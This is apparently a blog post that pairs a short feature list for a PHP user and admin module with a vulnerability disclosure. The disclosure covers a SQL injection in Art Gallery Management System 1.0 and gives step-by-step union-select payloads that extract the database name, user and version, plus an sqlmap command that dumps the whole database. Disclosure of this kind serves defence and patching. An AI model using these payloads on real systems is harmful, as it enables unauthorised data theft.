User Module
In user module, user can register yourself. After Registration user can log in with own email id and password.
if the user forgot their own password then user can request for password using their own email id.
User Registration
User Login
Forgot Password
Note: For Forgot password , you have provide your gmail credetails in password-recovery.php. After that email function will work on your localhost.
Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php.
Configurations :
cpe:2.3:a:phpgurukul:art_gallery_management_system:1.0:*:*:*:*:*:*:*
Steps Of Reproduce -
1. Go to the Sculptures by navigating the "ART TYPE" option in the navigation bar.
http://127.0.0.1/agms/product.php?cid=1&&artname=Sculptures
2. Here on this page in "cid" parameter by inserting single quotes to break the query we know that the "cid" parameter is vulnerable to SQL injection.
http://127.0.0.1/agms/product.php?cid=1'&&artname=Sculptures
3. Now join query
http://127.0.0.1/agms/product.php?cid=1'--+&&artname=Sculptures
3. Now run "order by " query to know the columns
127.0.0.1/agms/product.php?cid=1' order by 6 --+&&artname=Sculptures
4.Now By inserting the payload in the "cid" parameter we got the username, database, and database version.
127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,database(),5,6 --+&&artname=Sculptures
127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,current_user(),5,6 --+&&artname=Sculptures
127.0.0.1/agms/product.php?cid=1' union all select 1,2,3,version(),5,6 --+&&artname=Sculptures
5. Now dump all the database by using sqlmap:
sqlmap -u http://127.0.0.1/agms/product.php?cid=1 --dump-all --batch
Admin Panel
Admin can manage all registered users. Admin can update the user information and delete the user.
Admin can change own password
Admin Login
Manage users
Edit user information
Change Password(admin)
No comments:
Post a Comment